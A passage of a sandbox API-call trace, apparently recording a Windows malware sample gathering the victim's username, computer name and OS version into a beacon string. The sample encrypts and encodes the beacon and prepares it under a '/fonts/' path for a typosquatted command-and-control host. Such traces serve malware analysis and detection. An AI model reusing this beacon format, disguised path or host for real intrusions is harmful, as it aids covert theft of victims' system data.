HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0190.683] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff02c*=0x1c4, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0190.809] WaitForSingleObject (hHandle=0x1c4, dwMilliseconds=0x0) returned 0x0 [0190.809] SetEvent (hEvent=0x1c4) returned 1 [0190.810] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x11ff0a0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x11ff0a0*, lpdwBufferLength=0x11ff054*=0x4, lpdwIndex=0x11ff04c*=0x0) returned 1 [0190.810] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x0, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0) returned 0 [0190.810] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xcc) returned 0x2c59c90 [0190.810] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x16, lpBuffer=0x2c59c90, lpdwBufferLength=0x11ff054, lpdwIndex=0x11ff04c*=0x0 | out: lpBuffer=0x2c59c90*, lpdwBufferLength=0x11ff054*=0xca, lpdwIndex=0x11ff04c*=0x0) returned 1 [0190.810] ResetEvent (hEvent=0x1c4) returned 1 [0190.810] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x11ff050, dwNumberOfBytesToRead=0x4, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x11ff050*, lpdwNumberOfBytesRead=0x11ff05c*=0x4) returned 1 [0190.810] CreateStreamOnHGlobal (hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058) [0190.810] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x11ff058 | out: ppstm=0x11ff058*=0x7a1f50) returned 0x0 [0190.811] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1000) returned 0x2be03a0 [0190.811] ISequentialStream:RemoteWrite (in: This=0x7a1f50, pv=0x11ff050*=0x3c, cb=0x4, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0190.811] ResetEvent (hEvent=0x1c4) returned 1 [0190.811] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be03a0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be03a0*, lpdwNumberOfBytesRead=0x11ff05c*=0x220) returned 1 [0190.812] ISequentialStream:RemoteWrite (in: This=0x7a1f50, pv=0x2be03a0*=0x6c, cb=0x220, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0190.812] ResetEvent (hEvent=0x1c4) returned 1 [0190.812] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2be03a0, dwNumberOfBytesToRead=0x1000, lpdwNumberOfBytesRead=0x11ff05c | out: lpBuffer=0x2be03a0*, lpdwNumberOfBytesRead=0x11ff05c*=0x0) returned 1 [0190.813] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be03a0 | out: hHeap=0x2860000) returned 1 [0190.813] IStream:Stat (This=0x7a1f50, pstatstg=0x11fefe0, grfStatFlag=0x1) [0190.813] IStream:Stat (in: This=0x7a1f50, pstatstg=0x11fefe0, grfStatFlag=0x1 | out: pstatstg=0x11fefe0) returned 0x0 [0190.813] IStream:RemoteSeek (in: This=0x7a1f50, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0190.813] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x225) returned 0x2c5fd28 [0190.813] ISequentialStream:RemoteRead (in: This=0x7a1f50, pv=0x2c5fd28, cb=0x224, pcbRead=0x11ff03c | out: pv=0x2c5fd28*=0x3c, pcbRead=0x11ff03c*=0x224) returned 0x0 [0190.813] IUnknown:Release (This=0x7a1f50) returned 0x0 [0190.813] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff048*=0x3a0, bWaitAll=0, dwMilliseconds=0xea60) returned 0x0 [0190.813] InternetSetStatusCallbackA (hInternet=0xcc000c, lpfnInternetCallback=0x0) returned 0x2f7bbd [0190.813] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0190.813] InternetSetStatusCallbackA (hInternet=0xcc0008, lpfnInternetCallback=0x0) returned 0x2f7bbd [0190.813] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0190.813] InternetSetStatusCallbackA (hInternet=0xcc0004, lpfnInternetCallback=0x0) returned 0x2f7bbd [0190.813] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0190.814] CloseHandle (hObject=0x1c4) returned 1 [0190.814] CloseHandle (hObject=0x3a0) returned 1 [0190.814] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fd28 | out: hHeap=0x2860000) returned 1 [0190.815] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c90 | out: hHeap=0x2860000) returned 1 [0190.815] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fbb0 | out: hHeap=0x2860000) returned 1 [0190.816] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2be00d8 | out: hHeap=0x2860000) returned 1 [0190.816] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0190.817] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa40 | out: hHeap=0x2860000) returned 1 [0190.817] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5f238 | out: hHeap=0x2860000) returned 1 [0190.817] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0190.818] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5a510 | out: hHeap=0x2860000) returned 1 [0190.818] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) [0190.818] SetWaitableTimer (hTimer=0x13c, lpDueTime=0x11ff168, lPeriod=0, pfnCompletionRoutine=0x0, lpArgToCompletionRoutine=0x0, fResume=0) returned 1 [0190.818] WaitForMultipleObjects (nCount=0x2, lpHandles=0x11ff170*=0x13c, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0200.833] wsprintfA (in: param_1=0x11ff104, param_2="size=%u&hash=0x%08x" | out: param_1="size=0&hash=0x00000000") returned 22 [0200.834] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2c5a510 [0200.834] wsprintfA (in: param_1=0x2c5a510, param_2="soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x" | out: param_1="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1") returned 84 [0200.834] QueryPerformanceFrequency (in: lpFrequency=0x11ff0b8 | out: lpFrequency=0x11ff0b8*=100000000) returned 1 [0200.834] QueryPerformanceCounter (in: lpPerformanceCount=0x11ff0b0 | out: lpPerformanceCount=0x11ff0b0*=2869616129729) returned 1 [0200.835] wsprintfA (in: param_1=0x2c5a564, param_2="&uptime=%u" | out: param_1="&uptime=28696") returned 13 [0200.835] wsprintfA (in: param_1=0x2c5a571, param_2="&%s" | out: param_1="&size=0&hash=0x00000000") returned 23 [0200.835] wsprintfA (in: param_1=0x2c5a588, param_2="&action=%08x" | out: param_1="&action=00000000") returned 16 [0200.835] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0200.838] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xc) returned 0x2c5ea50 [0200.838] GetComputerNameExA (in: NameType=0x3, lpBuffer=0x2c5ea50, nSize=0x11ff0bc | out: lpBuffer="Q9iATrkPrH", nSize=0x11ff0bc) returned 1 [0200.839] wsprintfA (in: param_1=0x2c5a598, param_2="&dns=%s" | out: param_1="&dns=Q9iATrkPrH") returned 15 [0200.839] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0200.839] GetUserNameW (in: lpBuffer=0x0, pcbBuffer=0x11ff0bc | out: lpBuffer=0x0, pcbBuffer=0x11ff0bc) returned 0 [0200.841] GetComputerNameW (in: lpBuffer=0x0, nSize=0x11ff0bc | out: lpBuffer=0x0, nSize=0x11ff0bc) returned 0 [0200.841] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x5c) returned 0x2c59b28 [0200.841] GetUserNameW (in: lpBuffer=0x2c59b56, pcbBuffer=0x11ff0bc | out: lpBuffer="kEecfMwgj", pcbBuffer=0x11ff0bc) returned 1 [0200.841] GetComputerNameW (in: lpBuffer=0x2c59b6a, nSize=0x11ff0b8 | out: lpBuffer="Q9IATRKPRH", nSize=0x11ff0b8) returned 1 [0200.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kEecfMwgj@Q9IATRKPRH", cchWideChar=20, lpMultiByteStr=0x2c59b28, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kEecfMwgj@Q9IATRKPRHwQ_2B/i1TCRbNzT/ahU_2FdYHsk", lpUsedDefaultChar=0x0) returned 20 [0200.841] wsprintfA (in: param_1=0x2c5a5a7, param_2="&whoami=%s" | out: param_1="&whoami=kEecfMwgj@Q9IATRKPRH") returned 28 [0200.842] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0200.842] lstrlenA (lpString="trackingg-protectioon.cdn4.mozilla.net") returned 38 [0200.842] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x27) returned 0x2c5f250 [0200.842] memcpy (in: _Dst=0x2c5f250, _Src=0x2c59e4b, _Size=0x26 | out: _Dst=0x2c5f250) returned 0x2c5f250 [0200.842] wsprintfA (in: param_1=0x2c5a5c3, param_2="&os=%s" | out: param_1="&os=6.1_1_7601_x64") returned 18 [0200.842] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x800) returned 0x2be00d8 [0200.843] GetTickCount () returned 0x1b2e77e [0200.843] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x4) returned 0x2c59a68 [0200.843] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xa) returned 0x2c5ea50 [0200.843] lstrlenA (lpString="%s=%s&") returned 6 [0200.843] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x13) returned 0x2c59a78 [0200.843] sprintf (in: _Dest=0x2c59a78, _Format="%s=%s&" | out: _Dest="qeuxergwj=gxq&") returned 14 [0200.843] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5ea50 | out: hHeap=0x2860000) returned 1 [0200.843] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a68 | out: hHeap=0x2860000) returned 1 [0200.843] lstrlenA (lpString="qeuxergwj=gxq&") returned 14 [0200.843] lstrlenA (lpString="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28696&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 197 [0200.843] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xd4) returned 0x2c59b28 [0200.843] strcpy (in: _Dest=0x2c59b28, _Source="qeuxergwj=gxq&" | out: _Dest="qeuxergwj=gxq&") returned="qeuxergwj=gxq&" [0200.843] lstrcatA (in: lpString1="qeuxergwj=gxq&", lpString2="soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28696&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" | out: lpString1="qeuxergwj=gxq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28696&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned="qeuxergwj=gxq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28696&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64" [0200.843] lstrlenA (lpString="qeuxergwj=gxq&soft=2&version=250250&user=83970e269baf6206bdf8f7ea4e097cf9&server=50&id=20005&crc=1&uptime=28696&size=0&hash=0x00000000&action=00000000&dns=Q9iATrkPrH&whoami=kEecfMwgj@Q9IATRKPRH&os=6.1_1_7601_x64") returned 211 [0200.843] CryptAcquireContextW (in: phProv=0x11ff064, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x11ff064*=0x7917d8) returned 1 [0200.846] memcpy (in: _Dst=0x11ff044, _Src=0x2c59df8, _Size=0x10 | out: _Dst=0x11ff044) returned 0x11ff044 [0200.846] CryptImportKey (in: hProv=0x7917d8, pbData=0x11ff038*, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x0, phKey=0x11ff070 | out: phKey=0x11ff070*=0x77d378) returned 1 [0200.846] CryptSetKeyParam (hKey=0x77d378, dwParam=0x1, pbData=0x11ff054, dwFlags=0x0) returned 1 [0200.846] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0xe0) returned 0x2c59c08 [0200.846] memcpy (in: _Dst=0x2c59c08, _Src=0x2c59b28, _Size=0x10 | out: _Dst=0x2c59c08) returned 0x2c59c08 [0200.846] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c08*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.846] memcpy (in: _Dst=0x2c59c18, _Src=0x2c59b38, _Size=0x10 | out: _Dst=0x2c59c18) returned 0x2c59c18 [0200.846] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c18*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.846] memcpy (in: _Dst=0x2c59c28, _Src=0x2c59b48, _Size=0x10 | out: _Dst=0x2c59c28) returned 0x2c59c28 [0200.846] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c28*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.846] memcpy (in: _Dst=0x2c59c38, _Src=0x2c59b58, _Size=0x10 | out: _Dst=0x2c59c38) returned 0x2c59c38 [0200.846] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c38*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c48, _Src=0x2c59b68, _Size=0x10 | out: _Dst=0x2c59c48) returned 0x2c59c48 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c48*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c58, _Src=0x2c59b78, _Size=0x10 | out: _Dst=0x2c59c58) returned 0x2c59c58 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c58*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c68, _Src=0x2c59b88, _Size=0x10 | out: _Dst=0x2c59c68) returned 0x2c59c68 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c68*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c78, _Src=0x2c59b98, _Size=0x10 | out: _Dst=0x2c59c78) returned 0x2c59c78 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c78*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c88, _Src=0x2c59ba8, _Size=0x10 | out: _Dst=0x2c59c88) returned 0x2c59c88 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c88*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59c98, _Src=0x2c59bb8, _Size=0x10 | out: _Dst=0x2c59c98) returned 0x2c59c98 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59c98*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59ca8, _Src=0x2c59bc8, _Size=0x10 | out: _Dst=0x2c59ca8) returned 0x2c59ca8 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59ca8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59cb8, _Src=0x2c59bd8, _Size=0x10 | out: _Dst=0x2c59cb8) returned 0x2c59cb8 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cb8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59cc8, _Src=0x2c59be8, _Size=0x10 | out: _Dst=0x2c59cc8) returned 0x2c59cc8 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10, dwBufLen=0x20 | out: pbData=0x2c59cc8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.847] memcpy (in: _Dst=0x2c59cd8, _Src=0x2c59bf8, _Size=0x4 | out: _Dst=0x2c59cd8) returned 0x2c59cd8 [0200.847] CryptEncrypt (in: hKey=0x77d378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x4, dwBufLen=0x20 | out: pbData=0x2c59cd8*, pdwDataLen=0x11ff074*=0x10) returned 1 [0200.848] CryptDestroyKey (hKey=0x77d378) returned 1 [0200.848] CryptReleaseContext (hProv=0x7917d8, dwFlags=0x0) returned 1 [0200.848] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x1c0) returned 0x2c5fa38 [0200.848] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59c08 | out: hHeap=0x2860000) returned 1 [0200.849] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59b28 | out: hHeap=0x2860000) returned 1 [0200.849] StrTrimA (in: psz="L3wYuAHI2rRuLwvILLog81z8ABmqSJCyFQYdz32cLsEFIlmf3Di1+AKEcPKjfN5LDYWtPUwTy4nZZzQhi2WDDtoVVNQOzK4B6Gn0BEXbSxWYlHIvmwt6JXLfE2lXlpykbdOzRET6PlU39vUACYh4WdI7EbP0GJ58qg4IKUbhaKzmmTF9vqluWuIISVpwi5OcYpdFmOd/CoisBEyc1JOyN6ncqTV6/f+PeQp3fqrucB91i4Me3ZSAryawWqX0NuyeeCGRDewpWiBTDHlWj7r2F3dLkmEILI56iRQE5+q5OZS=", pszTrimChars="\r\n=" | out: psz="L3wYuAHI2rRuLwvILLog81z8ABmqSJCyFQYdz32cLsEFIlmf3Di1+AKEcPKjfN5LDYWtPUwTy4nZZzQhi2WDDtoVVNQOzK4B6Gn0BEXbSxWYlHIvmwt6JXLfE2lXlpykbdOzRET6PlU39vUACYh4WdI7EbP0GJ58qg4IKUbhaKzmmTF9vqluWuIISVpwi5OcYpdFmOd/CoisBEyc1JOyN6ncqTV6/f+PeQp3fqrucB91i4Me3ZSAryawWqX0NuyeeCGRDewpWiBTDHlWj7r2F3dLkmEILI56iRQE5+q5OZS") returned 1 [0200.849] lstrlenA (lpString="L3wYuAHI2rRuLwvILLog81z8ABmqSJCyFQYdz32cLsEFIlmf3Di1+AKEcPKjfN5LDYWtPUwTy4nZZzQhi2WDDtoVVNQOzK4B6Gn0BEXbSxWYlHIvmwt6JXLfE2lXlpykbdOzRET6PlU39vUACYh4WdI7EbP0GJ58qg4IKUbhaKzmmTF9vqluWuIISVpwi5OcYpdFmOd/CoisBEyc1JOyN6ncqTV6/f+PeQp3fqrucB91i4Me3ZSAryawWqX0NuyeeCGRDewpWiBTDHlWj7r2F3dLkmEILI56iRQE5+q5OZS") returned 299 [0200.849] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x382) returned 0x2c5fc00 [0200.849] _snprintf (in: _Dest=0x2c5fc34, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0200.849] _snprintf (in: _Dest=0x2c5fcc9, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0200.849] _snprintf (in: _Dest=0x2c5fce0, _Count=0x4, _Format="%c%02X" | out: _Dest="_2F") returned 3 [0200.849] _snprintf (in: _Dest=0x2c5fce4, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0200.849] _snprintf (in: _Dest=0x2c5fd2d, _Count=0x4, _Format="%c%02X" | out: _Dest="_2B") returned 3 [0200.850] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fa38 | out: hHeap=0x2860000) returned 1 [0200.850] lstrlenA (lpString="L3wYuAHI2rRuLwvILLog81z8ABmqSJCyFQYdz32cLsEFIlmf3Di1_2BAKEcPKjfN5LDYWtPUwTy4nZZzQhi2WDDtoVVNQOzK4B6Gn0BEXbSxWYlHIvmwt6JXLfE2lXlpykbdOzRET6PlU39vUACYh4WdI7EbP0GJ58qg4IKUbhaKzmmTF9vqluWuIISVpwi5OcYpdFmOd_2FCoisBEyc1JOyN6ncqTV6_2Ff_2BPeQp3fqrucB91i4Me3ZSAryawWqX0NuyeeCGRDewpWiBTDHlWj7r2F3dLkmEILI56iRQE5_2Bq5OZS") returned 309 [0200.850] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, Size=0x15c) returned 0x2c5fa38 [0200.850] memcpy (in: _Dst=0x2c5fa38, _Src=0x2c5fc00, _Size=0x16 | out: _Dst=0x2c5fa38) returned 0x2c5fa38 [0200.850] memcpy (in: _Dst=0x2c5fa4f, _Src=0x2c5fc16, _Size=0xd | out: _Dst=0x2c5fa4f) returned 0x2c5fa4f [0200.850] memcpy (in: _Dst=0x2c5fa5d, _Src=0x2c5fc23, _Size=0x8 | out: _Dst=0x2c5fa5d) returned 0x2c5fa5d [0200.851] memcpy (in: _Dst=0x2c5fa66, _Src=0x2c5fc2b, _Size=0x17 | out: _Dst=0x2c5fa66) returned 0x2c5fa66 [0200.851] memcpy (in: _Dst=0x2c5fa7e, _Src=0x2c5fc42, _Size=0xa | out: _Dst=0x2c5fa7e) returned 0x2c5fa7e [0200.851] memcpy (in: _Dst=0x2c5fa89, _Src=0x2c5fc4c, _Size=0x11 | out: _Dst=0x2c5fa89) returned 0x2c5fa89 [0200.851] memcpy (in: _Dst=0x2c5fa9b, _Src=0x2c5fc5d, _Size=0xc | out: _Dst=0x2c5fa9b) returned 0x2c5fa9b [0200.851] memcpy (in: _Dst=0x2c5faa8, _Src=0x2c5fc69, _Size=0xb | out: _Dst=0x2c5faa8) returned 0x2c5faa8 [0200.851] memcpy (in: _Dst=0x2c5fab4, _Src=0x2c5fc74, _Size=0xe | out: _Dst=0x2c5fab4) returned 0x2c5fab4 [0200.851] memcpy (in: _Dst=0x2c5fac3, _Src=0x2c5fc82, _Size=0x15 | out: _Dst=0x2c5fac3) returned 0x2c5fac3 [0200.851] memcpy (in: _Dst=0x2c5fad9, _Src=0x2c5fc97, _Size=0x10 | out: _Dst=0x2c5fad9) returned 0x2c5fad9 [0200.851] memcpy (in: _Dst=0x2c5faea, _Src=0x2c5fca7, _Size=0xf | out: _Dst=0x2c5faea) returned 0x2c5faea [0200.851] memcpy (in: _Dst=0x2c5fafa, _Src=0x2c5fcb6, _Size=0x12 | out: _Dst=0x2c5fafa) returned 0x2c5fafa [0200.851] memcpy (in: _Dst=0x2c5fb0d, _Src=0x2c5fcc8, _Size=0x9 | out: _Dst=0x2c5fb0d) returned 0x2c5fb0d [0200.851] memcpy (in: _Dst=0x2c5fb17, _Src=0x2c5fcd1, _Size=0x14 | out: _Dst=0x2c5fb17) returned 0x2c5fb17 [0200.851] memcpy (in: _Dst=0x2c5fb2c, _Src=0x2c5fce5, _Size=0x13 | out: _Dst=0x2c5fb2c) returned 0x2c5fb2c [0200.851] memcpy (in: _Dst=0x2c5fb40, _Src=0x2c5fcf8, _Size=0x16 | out: _Dst=0x2c5fb40) returned 0x2c5fb40 [0200.851] memcpy (in: _Dst=0x2c5fb57, _Src=0x2c5fd0e, _Size=0xd | out: _Dst=0x2c5fb57) returned 0x2c5fb57 [0200.851] memcpy (in: _Dst=0x2c5fb65, _Src=0x2c5fd1b, _Size=0x8 | out: _Dst=0x2c5fb65) returned 0x2c5fb65 [0200.851] memcpy (in: _Dst=0x2c5fb6e, _Src=0x2c5fd23, _Size=0xf | out: _Dst=0x2c5fb6e) returned 0x2c5fb6e [0200.851] memcpy (in: _Dst=0x2c5fb7e, _Src=0x2c5fd32, _Size=0x4 | out: _Dst=0x2c5fb7e) returned 0x2c5fb7e [0200.852] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c5fc00 | out: hHeap=0x2860000) returned 1 [0200.852] HeapFree (in: hHeap=0x2860000, dwFlags=0x0, lpMem=0x2c59a78 | out: hHeap=0x2860000) returned 1 [0200.852] StrTrimA (in: psz="L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS", pszTrimChars="\r\n" | out: psz="L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS") returned 0 [0200.852] lstrlenA (lpString="/fonts/") returned 7 [0200.852] lstrlenA (lpString="L3wYuAHI2rRuLwvILLog81/z8ABmqSJCyFQY/dz32cLsE/FIlmf3Di1_2BAKEcPKjfN5L/DYWtPUwTy4/nZZzQhi2WDDtoVVNQ/OzK4B6Gn0BEX/bSxWYlHIvmw/t6JXLfE2lXlpyk/bdOzRET6PlU39vUACYh4W/dI7EbP0GJ58qg4IK/UbhaKzmmTF9vqlu/WuIISVpwi5OcYpdFmO/d_2FCoisB/Eyc1JOyN6ncqTV6_2Ff_/2BPeQp3fqrucB91i4Me/3ZSAryawWqX0NuyeeCGRDe/wpWiBTDHlWj7r/2F3dLkmE/ILI56iRQE5_2Bq5/OZS") returned 329 [0200.852] RtlAllocateHeap (HeapHandle=0x2860000, Flags=0x0, 